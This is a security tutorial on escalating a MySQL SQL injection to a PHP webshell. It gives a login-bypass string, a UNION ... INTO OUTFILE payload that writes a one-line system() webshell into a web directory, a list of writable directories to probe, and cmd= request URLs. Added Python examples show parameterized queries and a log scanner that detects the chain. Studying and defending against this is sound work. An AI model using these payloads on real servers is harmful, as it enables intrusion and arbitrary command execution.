Backdoor Webserver using MySQL-SQL Injection

What is SQL Injection?

SQL injection is an attack that allows the attacker to add logical expressions and additional commands to the existing SQL query. This attack can succeed whenever a user has submitted data that is not properly validated and is glued together with a legitimate SQL query.

For example, the following SQL command is used to validate user login requests:

$sql_query = "select * from users where user='$user' and password='$pass'";


If the user-submitted data is not properly validated, an attacker can exploit this query and pass the login screen by simply submitting specially crafted variables. For example, an attacker can submit the following data as the $user variable: admin' or '1'='1 . When this $user variable is glued together with the query, it will look as follows:

$sql_query = "select * from users where user='admin' or '1'='1' and password='$pass'";


Now, the attacker can safely pass the login screen because or '1'='1' causes the query to always return a "true" value while ignoring the password value.
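The login check above, written both the vulnerable way and the way a defender fixes it, as an added example that is not part of the original article. It uses Python's sqlite3 module as a stand-in for MySQL (an assumption; the page's own code is PHP) and a constructed users table, so it runs offline. The value passed in is the same admin' or '1'='1 string the text shows.

```python
"""Vulnerable vs. parameterized login check (added example, not from the article).

SQLite stands in for MySQL here; the injection and the fix work the same way
against MySQL, only the placeholder syntax of the client library differs.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample database with a single administrative account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """Mirrors the page's $sql_query: user input is glued into the SQL text.

    A quote character in the input ends the string literal, so the rest of
    the input becomes part of the query's logic instead of staying data.
    """
    sql = f"select * from users where user='{user}' and password='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """Parameterized form: the SQL text is fixed, values travel separately.

    Quotes, OR, UNION and comment markers in the input are compared as
    plain characters against the column, never parsed as SQL.
    """
    sql = "select * from users where user=? and password=?"
    return conn.execute(sql, (user, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    bypass = "admin' or '1'='1"
    print("vulnerable, wrong password, injected user:", login_vulnerable(db, bypass, "wrong"))
    print("parameterized, same input:               ", login_safe(db, bypass, "wrong"))
    print("parameterized, real credentials:         ", login_safe(db, "admin", "s3cret"))
```

With MySQL the same fix is a prepared statement: `%s` placeholders in mysql-connector or PyMySQL, or PDO/mysqli prepared statements in PHP; the principle that the query text never contains user input is what stops both the login bypass and the UNION-based file write discussed later on this page.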

Using similar techniques, an attacker can retrieve database records, pass login screens, and change database contents, for example by creating new administrative users. In this document, I will show how, by applying similar techniques, we will be able to execute arbitrary shell commands.

Command 1 - Writing arbitrary files

MySQL has a built-in command that can be used to create and write system files. This command has the following format:

mysql> select "text" INTO OUTFILE "file.txt"

One big drawback of this command is that it can be appended to an existing query using the UNION keyword.

For example, it can be appended to the following query:

select user, password from user where user="admin" and password='123'

With the UNION part appended, the query becomes:

select user, password from user where user="admin" and password="123" union select "text",2 into outfile "/tmp/file.txt" -- '

As a result of the above command, the /tmp/file.txt file will be created containing the query result.

Command 2 - Reading arbitrary files

MySQL has a built-in command that can be used to read arbitrary files. The syntax is very simple. We will use this command for plan B.

mysql> select load_file("PATH_TO_FILE");

Webshell

Webshell is a popular and widely used tool for executing shell commands from within the web browser. Some call these tools PHP shells. We will create a very simple webshell that will execute shell commands. Here is the code of a very basic PHP shell (the value passed in the cmd parameter will be executed):

<? system($_REQUEST['cmd']); ?>

For example, in the following screenshot, the id command is executed:

[Screenshot: Webshell - id command]

Attack Scenario

1. Find SQL injection

It is out of the scope of this document. You must first find SQL injection.

2. Find a directory with write permission

To create a webshell PHP script, we need a directory with write permission. Temporary directories used by popular Content Management Systems are a good choice for this. Check the following URLs to find one:

hxxp://www.target.com/templates_compiled/
hxxp://www.target.com/templates_c/
hxxp://www.target.com/templates/
hxxp://www.target.com/temporary/
hxxp://www.target.com/images/
hxxp://www.target.com/cache/
hxxp://www.target.com/temp/
hxxp://www.target.com/files/

In our example we will use a temp directory.

3. Exploit SQL injection - create web shell

You need to append the following string to the legitimate SQL command:

UNION SELECT "<? system($_REQUEST['cmd']); ?>",2,3,4 INTO OUTFILE "/var/www/html/temp/c.php" --

Some explanation:

2,3,4 are just placeholders used to match the number of columns in the first part of the SELECT query.
/var/www/html is a default web directory in the RedHat-like distributions (Fedora, CentOS).
temp is a directory with full write access. In your case it could be a different directory.

The above command will write the query's result with the "<? system($_REQUEST['cmd']); ?>" string appended. Because we gave the file name a .php extension, this string will be treated as PHP code and will allow us to execute shell commands!

4. Execute shell commands

Now comes the easiest part. Simply request the newly written file from the web server to execute shell commands. In our example the URL will be:

hxxp://www.target.com/temp/c.php?cmd=SHELL_COMMAND

For example:

hxxp://www.target.com/temp/c.php?cmd=id
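The same chain seen from the defender's side, as an added example that is not part of the original article: a small Python scanner that runs over constructed Apache-style access-log lines (the IPs, timestamps and lines below are made up for the demo) and flags both stages described above, the UNION ... INTO OUTFILE injection in step 3 and the later cmd= requests to a .php file in one of the writable directories listed in step 2. The log format, the directory list and the function names (analyze_line, analyze_log) are my assumptions, not anything from GreenSQL.

```python
"""Detect the SQL-injection-to-webshell chain in web server access logs.

Added example (not from the original article). Log lines are constructed
for the demo; the directory list is the one suggested in step 2 of the page.
"""
import re
from urllib.parse import parse_qs, quote, unquote_plus, urlsplit

# Writable directories the page suggests an attacker would probe first.
WRITABLE_DIRS = (
    "/templates_compiled/", "/templates_c/", "/templates/", "/temporary/",
    "/images/", "/cache/", "/temp/", "/files/",
)

# Apache combined log format (assumed; matches the constructed SAMPLE_LOG).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Stage-1 indicators: MySQL file I/O glued onto a query via UNION, and a PHP
# open tag travelling inside a request parameter.
FILE_IO_RE = re.compile(r"\b(?:into\s+(?:out|dump)file|load_file\s*\()", re.I)
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)
PHP_TAG_RE = re.compile(r"<\?")


def analyze_line(line: str):
    """Return a finding dict for a suspicious line, or None for a clean one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode once so percent-encoded SQL and PHP are visible to the patterns.
    decoded = unquote_plus(m.group("target"))
    parts = urlsplit(decoded)
    reasons = []
    if FILE_IO_RE.search(decoded):
        reasons.append("MySQL file I/O (INTO OUTFILE / LOAD_FILE) in request")
    if UNION_RE.search(decoded):
        reasons.append("UNION SELECT in request")
    if PHP_TAG_RE.search(decoded):
        reasons.append("PHP open tag in request")
    # Stage 2: a script executed out of a directory meant for uploads or
    # cache files, driven by a cmd parameter (the page's c.php?cmd=... URL).
    in_writable = any(parts.path.startswith(d) for d in WRITABLE_DIRS)
    if in_writable and parts.path.endswith(".php") and "cmd" in parse_qs(parts.query):
        reasons.append("cmd= request to a script in a writable directory")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "path": parts.path, "reasons": reasons}


def analyze_log(text: str):
    """Scan every line of an access log; findings are returned in log order."""
    findings = []
    for line in text.splitlines():
        finding = analyze_line(line)
        if finding:
            findings.append(finding)
    return findings


def _line(ip: str, ts: str, target: str, status: int = 200) -> str:
    """Build one constructed combined-format log line."""
    return f'{ip} - - [{ts}] "GET {target} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'


# The injected value from step 3 of the page, percent-encoded as it would
# appear in a request line.
_INJECT = ("admin' union select \"<? system($_REQUEST['cmd']); ?>\",2,3,4 "
           "into outfile \"/var/www/html/temp/c.php\" -- ")

# Constructed sample traffic: a normal login, the injection, the follow-up
# command request, and an unrelated static file from another client.
SAMPLE_LOG = "\n".join([
    _line("203.0.113.5", "10/Oct/2023:13:55:36 +0000", "/login.php?user=admin&pass=123"),
    _line("203.0.113.5", "10/Oct/2023:13:55:40 +0000",
          "/login.php?user=" + quote(_INJECT, safe="") + "&pass=x"),
    _line("203.0.113.5", "10/Oct/2023:13:55:52 +0000", "/temp/c.php?cmd=id"),
    _line("198.51.100.7", "10/Oct/2023:14:01:02 +0000", "/images/logo.png"),
])


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["path"], "->", "; ".join(f["reasons"]))
```

Two findings from the same client a few seconds apart, a file-writing injection followed by a cmd= request into a temp directory, is the pattern worth alerting on; either stage alone is noisy. On the database side, INTO OUTFILE and LOAD_FILE both require the MySQL FILE privilege and, on current MySQL releases, are confined by the secure_file_priv setting, so a web application account without FILE cannot drop the file in the first place; on the web server side, directories that the application can write to should not be ones from which PHP is executed.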


Source: GreenSQL
